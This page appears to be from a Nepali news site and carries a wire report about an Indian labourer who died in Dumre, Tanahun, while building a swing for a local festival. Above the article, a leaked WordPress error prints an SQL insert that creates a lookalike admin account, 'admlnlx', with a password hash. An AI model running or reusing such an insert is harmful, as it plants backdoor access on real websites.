WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B45a4cvL22SFlcyJ3ajAbv5tGC6dgr/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-14 19:27:02', '', 'admlnlx', 'admlnlx')
दमौली,मंसिर २९ –
तनहुँको बन्दीपुर नगरपालिका– १ डुम्रेमा आज बिहान एक भारतीय मजदुरको मृत्यु भएको छ ।
मृत्यु हुनेमा भारत अलिगढ घर भएका ६० वर्षीय क्षेत्र पाल रहेको जिल्ला प्रहरी कार्यालय तनहुँले जनाएको छ । यही मङ्सिर २४ गतेदेखि पुस ४ गतेसम्म हुने तेस्रो डुम्रे महोत्सवका लागि पिङ बनाउन पाल भरतबाट यहाँ आएका थिए ।
डुम्रे सांस्कृतिक परिवारको भवन अगाडि पाल आज बिहान एक्कासि ढलेको र त्यही मृत्यु भएको जनाएको छ । शव परीक्षणका लागि दमौली अस्पताल पठाइएको र घटनाबारे अनुसन्धान भइरहेको प्रहरीले जनाएको छ । – रासस